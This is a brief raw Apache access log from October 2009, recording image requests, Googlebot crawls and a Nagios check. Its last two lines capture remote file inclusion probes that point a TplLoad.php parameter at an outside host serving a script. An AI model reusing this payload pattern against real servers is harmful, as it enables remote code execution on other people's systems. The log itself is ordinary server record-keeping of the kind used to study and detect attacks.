207.200.116.73 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032465_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.14 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/cat_dot.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/cat_expand.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.130 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032467_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.68.226 - - [13/Oct/2009:03:18:16 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.216 - - [13/Oct/2009:03:18:17 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [13/Oct/2009:03:18:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.172.225.50 - - [13/Oct/2009:03:18:37 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:03:18:37 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
